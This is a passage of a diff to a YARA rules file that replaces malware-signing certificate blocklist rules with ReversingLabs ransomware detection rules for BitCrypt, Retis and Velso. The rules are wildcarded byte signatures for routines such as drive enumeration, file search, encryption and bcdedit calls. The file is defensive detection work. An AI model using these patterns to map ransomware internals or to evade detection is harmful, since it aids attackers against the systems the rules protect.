+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 83 7D ?? ?? 7D ?? 8B 4D ?? 8B 94
+            8D ?? ?? ?? ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 33 C0 E9 ?? ?? ??
+            ?? EB ?? 8B 4D ?? 8B 55 ?? 8B 81 ?? ?? ?? ?? 3B 82 ?? ?? ?? ?? 76 ?? B8 ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 75 ?? B8 ??
+            ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ??
+            83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 50
+            FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8B 4D ?? 83 C1 ?? 51 FF 15 ?? ?? ?? ??
+            85 C0 75 ?? EB ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 83 C1
+            ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 85 C0 74 ?? 8B 4D ?? 81 79 ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ??
+            ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B 4D ??
+            81 79 ?? ?? ?? ?? ?? 75 ?? 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ??
+            ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 03 45 ?? 89
+            45 ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 8B 4D ?? 81 C1 ?? ?? ?? ?? 51 8B 55 ??
+            81 C2 ?? ?? ?? ?? 52 8B 45 ?? 05 ?? ?? ?? ?? 50 8B 4D ?? 81 C1 ?? ?? ?? ?? 51 8B 55
+            ?? 81 C2 ?? ?? ?? ?? 52 8B 45 ?? 05 ?? ?? ?? ?? 50 8B 4D ?? 81 C1 ?? ?? ?? ?? 51 8B
+            55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Project NSRM Ltd" and ( pe.signatures [ i ] . serial == "00:83:2e:16:1a:ea:52:06:d8:15:f9:73:e5:a1:fe:b3:e7" or pe.signatures [ i ] . serial == "83:2e:16:1a:ea:52:06:d8:15:f9:73:e5:a1:fe:b3:e7" ) and 1549830060 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $search_files and ( all of ( $encrypt_files_* ) ) and $remote_connection )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_09Aecea45Bfd40Ce7D62D7D711916D7D : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Bitcrypt : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects BitCrypt ransomware."
 		author = "ReversingLabs"
-		id = "421425b1-13ad-5d80-b044-8bd43c60b3ff"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "f00a0fd8-31a9-5ee6-b560-09ccf6fe490b"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3008-L3024"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d1c6bfb10a244ba866c8aabdff6055388afa8096fd4bd77bb21f781794333e9b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.BitCrypt.yara#L3-L112"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "66cfe16a182e7f20d6358be9569ada5e6c36c94d44781d8c741638e1b174d44e"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "BitCrypt"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$bc_bcdedit = {
+            55 8B EC 6A ?? 53 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B D8 BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C3
+            E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8D 45
+            ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ??
+            ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ??
+            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? C3
+        }
+		$bc_enum_drives_a_z = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 D2 89 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B F0 33 C0 55 68 ?? ?? ??
+            ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 06 B3 ?? 8D 85 ?? ?? ?? ?? 8B D3 E8 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ??
+            8D 45 ?? B1 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B D3 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 E8 ?? 75 1B 8D 85 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ??
+            ?? 8B 06 8B 08 FF 51 ?? 43 80 FB ?? 0F 85 65 FF FF FF 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C3
+        }
+		$bc_do_extensions_1 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D
+            ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 4D ?? 89 55 ?? 89 45 ?? 8B 7D ?? 8B 5D ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 ??
+            ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 85 81 01 00 00 E8 ?? ?? ?? ?? BA ??
+            ?? ?? ?? 33 C0 E8 ?? ?? ?? ?? 8B F0 8B C3 8B 14 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB 28 A0 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
+            50 8B 03 33 C9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B 13 B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            85 C0 75 C8 EB 28 A0 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8B 03 33 C9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B
+            C3 E8 ?? ?? ?? ?? 8B 13 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 C8 FF 75 ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? DB 85 ?? ?? ?? ?? 83 C4 ?? DB 3C
+        }
+		$bc_do_extensions_2 = {
+            24 9B 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B C7 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 13 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 17 8D 85 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? B3 ?? EB 02 33 DB 33 C0 5A 59 59 64 89 10 EB 0C E9 ?? ?? ?? ?? 33 DB E8 ?? ??
+            ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB D0 8B C3 5F 5E 5B 8B E5 5D C2
+        }
+		$bc_do_files_1 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 55 ?? 8B F0
+            8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B3 ?? 8B 06 E8 ?? ?? ?? ??
+            89 45 ?? 8B 16 8D 85 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B F8 85 FF 0F 85 91 00 00 00 F6 85 ?? ?? ?? ?? ?? 75 73 56 8D B5 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 A5
+            5E 8B 85 ?? ?? ?? ?? 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 33 D2 E8 ?? ?? ?? ?? 83 C4 ?? DD 1C 24 9B 8D 45 ?? E8
+            ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 36 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ??
+            ?? ?? 8B 45 ?? 8B 40 ?? 8B 00 8B 08 FF 51 ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85 FF 0F 84 6F FF FF FF 8D 85 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 84 DB 0F 84 B7 00 00 00 8B 16 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D
+        }
+		$bc_do_files_2 = {
+            8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85 FF 75 7E F6 85 ?? ?? ?? ?? ?? 74 64 8B 85 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 74 52 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 40 FF 36 FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B
+            C6 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 50 8B C6 8B 55 ?? E8 57 FE FF FF 59 84 C0 75 04 33 DB EB 21 8B 55 ?? 42 8B C6
+            B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85 FF 74 82 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0
+            5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
+        }
+		$bc_main_1 = {
+            55 8B EC B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 F9 53 56 57 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64
+            89 20 33 C0 A3 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ??
+            ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ??
+            ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ??
+            ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 8D 45 ?? 8B 0D ?? ?? ?? ??
+            8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 75 7A 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B
+        }
+		$bc_main_2 = {
+            15 ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8D 45 ?? 8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ??
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 33 C0 E8 ?? ?? ?? ?? 8B 45 ?? 50 8D 45 ?? 8B 0D ?? ?? ?? ?? 8B 15
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 58 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB 11 BA ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B D8 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 80 FB ?? 0F 85 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? B2 ?? A1 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 75 ED A1 ?? ?? ?? ?? 8B 10 FF 52 ?? 83 F8 ?? 0F
+            8E ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 10 FF 52 ?? 99 F7 3D ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 10 FF 52 ?? 99 F7 3D
+            ?? ?? ?? ?? 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 48 85 C0 7C ?? 40 89 45 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ??
+        }
+		$bc_main2 = {
+            E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 45 ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D
+            ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALINA LTD" and pe.signatures [ i ] . serial == "09:ae:ce:a4:5b:fd:40:ce:7d:62:d7:d7:11:91:6d:7d" and 1551052800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $bc_main_1 at pe.entry_point ) and $bc_main_2 and $bc_main2 and $bc_bcdedit and $bc_enum_drives_a_z and $bc_do_extensions_1 and $bc_do_extensions_2 and $bc_do_files_1 and $bc_do_files_2
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4Ff4Eda5Fa641E70162713426401F438 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Retis : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Retis ransomware."
 		author = "ReversingLabs"
-		id = "3e34aa1b-a4b1-593d-bd93-0f5913ab96b9"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "3d1de7c2-abb7-5411-a598-6bc68229a22a"
+		date = "2021-08-12"
+		modified = "2021-08-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3026-L3042"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "58f5e163d9807520497ba55e42c048020f6b7653ed71f3954e7ffb490f4de0e4"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.Retis.yara#L1-L74"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3e3429041acc5730b009916efbcd35c7cfd2b2877dc1d2cf980f7fb7d399d532"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Retis"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$search_files = {
+            00 00 04 6F ?? ?? ?? ?? 0B 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 0C 00 08 28 ?? ?? ?? ??
+            0A 72 ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 03 6F ?? ?? ??
+            ?? 0D 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 00 00 72 ?? ?? ?? ?? 11 ?? 72 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 06 72 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 17 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ??
+            12 ?? 28 ?? ?? ?? ?? 13 07 00 11 ?? 73 ?? ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ?? ?? ?? 16 FE
+            ?? 13 ?? 11 ?? 2C ?? 00 02 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 1F ?? 28 ?? ?? ?? ??
+            00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 00 00 2B ?? 00 1F ?? 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ??
+            ?? 00 72 ?? ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 00 12 ??
+            28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 00 DE
+            ?? 26 00 00 DE ?? 00 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ?? ??
+            6F ?? ?? ?? ?? 00 DC 00 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 00 DC 2A
+        }
+		$search_drives = {
+            00 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 00 06 0C 16 0D 2B ?? 08 09 9A 13 ?? 00
+            11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 07 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 00 00 00 09 17 58 0D 09 08 8E 69 32 ?? 07 72 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 26 00 07 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ??
+            13 ?? 00 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 00 03 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ??
+            12 ?? 28 ?? ?? ?? ?? 13 ?? 00 00 72 ?? ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 00 11 ?? 72 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 17 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 2B ??
+            12 ?? 28 ?? ?? ?? ?? 13 ?? 00 02 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 1F ??
+            28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 11 ?? 6F
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE ??
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 00 DE ?? 26 00 00 DE ?? 00 12 ?? 28 ?? ?? ??
+            ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 00 12 ??
+            28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 00
+            DC 2A
+        }
+		$encrypt_files = {
+            00 03 19 17 73 ?? ?? ?? ?? 0A 06 6F ?? ?? ?? ?? D4 8D ?? ?? ?? ?? 0B 06 07
+            16 07 8E 69 6F ?? ?? ?? ?? 26 06 6F ?? ?? ?? ?? 00 03 18 18 73 ?? ?? ?? ??
+            0C 73 ?? ?? ?? ?? 0D 09 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 00 09 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 00 09 6F ?? ?? ?? ?? 13 ?? 08 11 ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 07
+            16 07 8E 69 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00
+            03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DUHANEY LIMITED" and pe.signatures [ i ] . serial == "4f:f4:ed:a5:fa:64:1e:70:16:27:13:42:64:01:f4:38" and 1555349604 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $search_files and $search_drives and $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_067Dffc5E3026Eb4C62971C98Ac8A900 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Velso : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Velso ransomware."
 		author = "ReversingLabs"
-		id = "9b9771bb-c2a4-5a6e-8fdb-b3e98f62f9b1"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "72c7baaa-4f83-54c5-ba71-2b45e5eeefd2"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3044-L3060"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2b7c4cded14afd8ba3feabb6debaa1317917b811b44e22aa8a0b3ea00d689141"
